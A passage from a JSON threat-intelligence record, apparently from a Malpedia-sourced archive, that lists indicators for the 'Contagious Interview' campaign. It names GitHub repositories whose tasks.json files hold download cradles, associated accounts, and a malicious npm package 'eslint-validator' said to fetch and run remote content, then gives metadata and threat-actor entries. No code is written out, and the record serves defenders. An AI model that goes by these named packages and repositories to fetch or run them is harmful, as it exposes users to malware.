Description\r\nItsmeBlackOps/Wisepanda-bot-main | Contains tasks.json with download cradles using Gist URLs\r\nBT-AURA/Auto-Stacking | Contains tasks.json with download cradles using Gist URLs\r\nicode4fuud/deploy-cloudrun | Has package.json with malicious \"eslint-validator\" dependency\r\nicode4fuud/copilot-sdk | Has package.json with malicious \"eslint-validator\" dependency\r\nNaboni/CartPanda | Has package.json with malicious \"eslint-validator\" dependency\r\nPavel-Shcherbo/defiguard-dev | Contains tasks.json with download cradles using short[.]gy URL\r\nannasudol/Web3Aggregator | Contains tasks.json with download cradles using short[.]gy URL\r\n0xroaman-2/Royal | Contains tasks.json with download cradles using short[.]gy URL\r\nicecoldjay/bri | Contains tasks.json with download cradles using short[.]gy URL\r\ngitOxentrolance/hireonchain | Contains tasks.json with download cradles using short[.]gy URL\r\nishanrt119/NFT-Marketplace | Contains tasks.json with download cradles using short[.]gy URL\r\nhellomanishahere/NFT-Marketplace | Contains tasks.json with download cradles using short[.]gy URL\r\nMindshare-Solution-Tech/card-activity | Contains tasks.json with download cradles using short[.]gy URL\r\nmindshare-solution-collect/card-activity | Contains tasks.json with download cradles using short[.]gy URL\r\nmdimran29/card-activity | Contains tasks.json with download cradles using short[.]gy URL\r\nartickc/card-activity | Contains tasks.json with download cradles using short[.]gy URL\r\nSatAi999/card-activity | Contains tasks.json with download cradles using short[.]gy URL\r\nOvaisKhanday/card-activity | Contains tasks.json with download cradles using short[.]gy URL\r\nDevba/W3agregador | Contains tasks.json with download cradles using short[.]gy URL\r\nTechProsA/W3GLFun-smartcontracts | Contains tasks.json with download cradles using short[.]gy URL\r\nMaxEdgr/P12 | Contains tasks.json with download cradles using short[.]gy URL\r\nbohdan0219/nft_project | Contains tasks.json with download cradles using short[.]gy URL\r\nbohdan0219/smart_contract | Contains tasks.json with download cradles using short[.]gy URL\r\nadadsws/shannon | (Possibly unrelated to campaign) Malicious fork with tasks.json downloader\r\nAssociated Users\r\nUser | Description\r\ncuda-toolkit | Deleted Gist account hosting payloads masqueraded as NVIDIA software\r\nlincoln0809 | npm user who published the malicious \"eslint-validator\" package\r\nItsmeBlackOps | Owner of Wisepanda-bot-main repo\r\nBT-AURA | Owner of Auto-Stacking repo\r\nicode4fuud | Owner of deploy-cloudrun and copilot-sdk repos\r\nNaboni | Owner of CartPanda repo\r\nPavel-Shcherbo | Owner of defiguard-dev repo\r\nannasudol | Owner of Web3Aggregator repo\r\n0xroaman-2 | Owner of Royal repo\r\nicecoldjay | Owner of bri repo\r\ngitOxentrolance | Owner of hireonchain repo\r\nishanrt119 | Owner of NFT-Marketplace repo\r\nhellomanishahere | Owner of NFT-Marketplace repo\r\nMindshare-Solution-Tech | Owner of card-activity repo\r\nmindshare-solution-collect | Owner of card-activity repo\r\nmdimran29 | Owner of card-activity repo\r\nartickc | Owner of card-activity repo\r\nSatAi999 | Owner of card-activity repo\r\nOvaisKhanday | Owner of card-activity repo\r\nDevba | Owner of W3agregador repo\r\nTechProsA | Owner of W3GLFun-smartcontracts repo\r\nMaxEdgr | Owner of P12 repo\r\nbohdan0219 | Owner of nft_project and smart_contract repos\r\nadadsws | (Possibly unrelated to campaign) Owner of malicious shannon fork\r\nMalicious NPM Packages\r\nPackage | Description\r\neslint-validator | Fetches and executes content from Google Drive\r\nSource: https://www.abstract.security/blog/contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.abstract.security/blog/contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains"
	],
	"report_names": [
		"contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8c8fea8c-c957-4618-99ee-1e188f073a0e",
			"created_at": "2024-02-02T02:00:04.086766Z",
			"updated_at": "2026-04-10T02:00:03.563647Z",
			"deleted_at": null,
			"main_name": "Storm-1567",
			"aliases": [
				"Akira",
				"PUNK SPIDER",
				"GOLD SAHARA"
			],
			"source_name": "MISPGALAXY:Storm-1567",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "910b38e9-07fe-4b47-9cf4-e190a07b1b84",
			"created_at": "2024-04-24T02:00:49.516358Z",
			"updated_at": "2026-04-10T02:00:05.309426Z",
			"deleted_at": null,
			"main_name": "Akira",
			"aliases": [
				"Akira",
				"GOLD SAHARA",
				"PUNK SPIDER",
				"Howling Scorpius"
			],
			"source_name": "MITRE:Akira",
			"tools": [
				"Mimikatz",
				"PsExec",
				"AdFind",
				"Akira _v2",
				"Akira",
				"Megazord",
				"LaZagne",
				"Rclone"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "4fc99d9b-9b66-4516-b0db-520fbef049ed",
			"created_at": "2025-10-29T02:00:51.949631Z",
			"updated_at": "2026-04-10T02:00:05.346203Z",
			"deleted_at": null,
			"main_name": "Contagious Interview",
			"aliases": [
				"Contagious Interview",
				"DeceptiveDevelopment",
				"Gwisin Gang",
				"Tenacious Pungsan",
				"DEV#POPPER",
				"PurpleBravo",
				"TAG-121"
			],
			"source_name": "MITRE:Contagious Interview",
			"tools": [
				"InvisibleFerret",
				"BeaverTail",
				"XORIndex Loader",
				"HexEval Loader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434672,
	"ts_updated_at": 1775826765,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3c5310b71d1e6948dd17e94a8b2708d4bb9e5743.pdf",
		"text": "https://archive.orkl.eu/3c5310b71d1e6948dd17e94a8b2708d4bb9e5743.txt",
		"img": "https://archive.orkl.eu/3c5310b71d1e6948dd17e94a8b2708d4bb9e5743.jpg"
	}
}